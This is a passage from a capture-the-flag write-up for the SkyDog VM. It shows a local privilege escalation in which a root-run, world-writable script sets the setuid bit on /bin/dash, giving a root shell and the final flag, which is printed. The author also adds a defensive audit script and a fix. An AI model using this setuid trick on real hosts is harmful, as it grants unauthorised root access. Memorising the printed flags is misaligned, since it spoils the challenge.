    os.system('chmod u+s /bin/dash')
except:
    sys.exit()
Some time later, I check the '/bin/dash' binary.
wernerbrandes@skydogctf:~$ ls -alh /bin/dash
-rwsr-xr-x 1 root root 119K Feb 19 2014 /bin/dash
Awesome! Now, we should be able to get a dash session as root, simply by executing '/bin/dash'.
wernerbrandes@skydogctf:~$ /bin/dash
# id
uid=1001(wernerbrandes) gid=1001(wernerbrandes) euid=0(root) groups=0(root),1001(wernerbrandes)
Great success.
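What made this work is a root-owned, world-writable script that a privileged job runs on a schedule, exactly the thing a host audit should flag before anyone finds it with find. As an added example (my code, not from the writeup or the VM), here is a small Python audit that walks likely script directories and reports root-owned files that other users can modify, or that carry setuid, as the modified /bin/dash now does. The directory list is an assumption, and demo() builds its own throwaway tree in a temp directory rather than touching the real system.

```python
import os
import stat
import tempfile

# Places a root-run job is likely to pick scripts up from; the writeup's
# offending file lived under /lib/log. Assumed list, extend for a real host.
DEFAULT_ROOTS = ("/etc/cron.d", "/etc/cron.daily", "/etc/cron.hourly",
                 "/etc/cron.weekly", "/etc/cron.monthly", "/lib/log",
                 "/usr/local/bin")


def classify(st):
    """Return the findings for one regular file, based on its mode bits."""
    mode = st.st_mode
    findings = []
    if mode & stat.S_IWOTH:
        findings.append("world-writable")
    if mode & stat.S_IWGRP and st.st_gid != 0:
        findings.append("group-writable (gid %d)" % st.st_gid)
    if mode & stat.S_ISUID:
        findings.append("setuid")
    return findings


def audit(roots, privileged_uid=0):
    """Walk roots and return {path: [findings]} for regular files owned by
    privileged_uid that someone else could modify, or that are setuid.
    lstat is used and symlinks are skipped, so a planted link cannot
    redirect the audit at something else."""
    report = {}
    for root in roots:
        for dirpath, _dirs, files in os.walk(root):
            for name in files:
                path = os.path.join(dirpath, name)
                try:
                    st = os.lstat(path)
                except OSError:
                    continue
                if not stat.S_ISREG(st.st_mode) or st.st_uid != privileged_uid:
                    continue
                findings = classify(st)
                if findings:
                    report[path] = findings
    return report


def demo():
    """Constructed check, not the CTF host: one mode-777 script like
    sanitizer.py next to one properly locked-down script."""
    with tempfile.TemporaryDirectory() as tmp:
        bad = os.path.join(tmp, "sanitizer.py")
        good = os.path.join(tmp, "rotate.sh")
        for p in (bad, good):
            with open(p, "w") as f:
                f.write("#!/bin/sh\n")
        os.chmod(bad, 0o777)
        os.chmod(good, 0o755)
        # The files we just made are owned by us, so audit as the current uid.
        report = audit([tmp], privileged_uid=os.getuid())
        return {os.path.basename(k): v for k, v in report.items()}


if __name__ == "__main__":
    for path, findings in sorted(audit(DEFAULT_ROOTS).items()):
        print(path, ", ".join(findings))
```

The fix on the VM is the obvious one: chmod o-w on the script (and g-w unless the group is root), plus chmod u-s on /bin/dash once the CTF is done.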
Time to find our last flag.
# cd /root
# ls -alh
total 36K
drwx------ 3 root root 4.0K Oct 30 19:09 .
drwxr-xr-x 22 root root 4.0K Sep 14 17:26 ..
-rw------- 1 root root 326 Oct 30 19:10 .bash_history
-rw-r--r-- 1 root root 3.1K Feb 19 2014 .bashrc
drwxr-xr-x 2 root root 4.0K Sep 18 17:51 BlackBox
-rw------- 1 root root 12 Oct 30 19:04 .nano_history
-rw-r--r-- 1 root root 140 Feb 19 2014 .profile
-rw-r--r-- 1 root root 66 Oct 25 11:17 .selected_editor
-rw------- 1 root root 1.7K Oct 30 19:09 .viminfo
# cd BlackBox
# ls -alh
total 12K
drwxr-xr-x 2 root root 4.0K Sep 18 17:51 .
drwx------ 3 root root 4.0K Oct 30 19:09 ..
-rw-r--r-- 1 nemo nemo 155 Sep 18 17:50 flag.txt
# echo $(cat flag.txt)
flag{b70b205c96270be6ced772112e7dd03f}
Congratulations!! Martin Bishop is a free man once again! Go here to receive your reward.
/CongratulationsYouDidIt
And there it is.
Flag #6 Little Black Box
flag{b70b205c96270be6ced772112e7dd03f}
If we browse to '/CongratulationsYouDidIt', we're shown a scene from Karate Kid. Such feels!
Conclusion
This was a nice little VM - the OSINT steps were a nice addition, and the hiding of content within the flags (by means of the MD5 hash) was cool.
I'm pretty bummed out that I had to get a hint from the author in order to solve it, but enjoyed it nonetheless.